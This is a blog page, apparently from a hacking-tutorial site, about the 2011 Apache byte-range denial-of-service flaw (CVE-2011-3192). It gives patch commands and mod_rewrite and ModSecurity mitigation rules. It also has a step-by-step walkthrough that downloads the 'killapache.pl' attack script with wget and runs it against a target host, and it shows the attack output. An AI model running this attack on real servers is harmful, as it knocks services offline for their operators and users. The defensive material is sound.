apachekiller.pl

Apache have released Patch for the recent range bytes request flaw which we published few days ago. This patch fix the Security flaw and

Change Log :

SECURITY: CVE-2011-3192 (cve.mitre.org) core: Fix handling of byte-range requests
to use less memory, to avoid denial of service. If the sum of all ranges in a
request is larger than the original file, ignore the ranges and send the complete
file. PR 51714.

You can download latest stable release here

If you are running CEntOS, you can update it in this way;

Check update using Yum Utility
yum check-update httpd

Install it
yum update httpd

If don’t want to update it, you can see this post for mitigation techniques.

{ 1 comment }

We were following a thread , it was related to apache flaw which was discovered by KingCope.

What is ‘Apache Killer’ Flaw?

It sends multiple GET requests with dozens of “Byte Ranges” that will eat up server’s memory. Byte Range helps browswer or downloading applications to download required parts of file. This helps reduce bandwidth usage. While this script sends dozen of unsorted components in request header to cause apache server to malfunction.

It is DoS condition on Apache web Server. I performed a test with a script written by @KingCope and can confirm that it will eat up Server resource in seconds.

Although the patch isn’t available from apache.org yet, we are still waiting for an update from Apache.

When some one execute this attack on your server, it will eat up your 1 GB RAM in 10 seconds, your CPU load will hit 10 average load and our server will finally freeze. Test it out before Apache release the fix

How to use ‘Apache Killer’ Exploit on Linux (BackTrack 5) :

before you use this tiny script, you have to install one perl extension using cpan utility.

cpan -i Parallel::ForkManager

Download perl script :
wget http://static.hackersgarage.com/killapache.pl.hackersgarage.com
mv killapache.pl.hackersgarage.com killapache.pl

Make it executable :
chmod u+x killapache.pl

Exploit your target :
perl killapache.pl example.com 50

Output :
host seems vuln
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp

Mitigation for Apache Killer Range bytes header flaw?

From Full Disclosure mailing list is as follows;
More mitigation techniques defined : http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/browser

Option 1: (Apache 2.0 and 2.2)

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range

Option 2: (Also for Apache 1.3)

# Reject request when more than 5 ranges in the Range: header.
# CVE-2011-3192
#
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* - [F]

Update 1 (26 Aug, 2011):

You can use mod_rewrite to mitigate this flaw

# Explicitly allow "range:0-" request from Flash uploaded client request
RewriteCond %{HTTP:range} ^bytes=0-$
RewriteRule .* - [L]

# @see http://marc.info/?l=apache-httpd-dev&m=131418828705324&w=2
RewriteCond %{HTTP:range} ^bytes=[^,]+(,[^,]+){0,4}$
RewriteRule .* - [F]

For Mod_Security ModSecurity 1.x users might do the trick – assuming they don’t really rely or use range request headers for anything.

# ApacheKiller - 2011 Flaw
SecFilterSelective HTTP_Range !(^$|^bytes=0-$)
SecFilterSelective HTTP_Request-Range !(^$|^bytes=0-$)

Supposed to say: We accept range headers only when
- "^$" empty value - or header not present
- value is "bytes=0-"

Update 2 : Apache Releases FIX
Complete release is available here.

{ 10 comments }

apachekiller.pl

KillApachePy – KillApache python version

Apache released patch for ApacheKiller.pl Range Byte Flaw

Apache Killer – Denial of Service Flaw in Apache WebServer

Search HACKING Tutorials

Get Email Updates(Its FREE)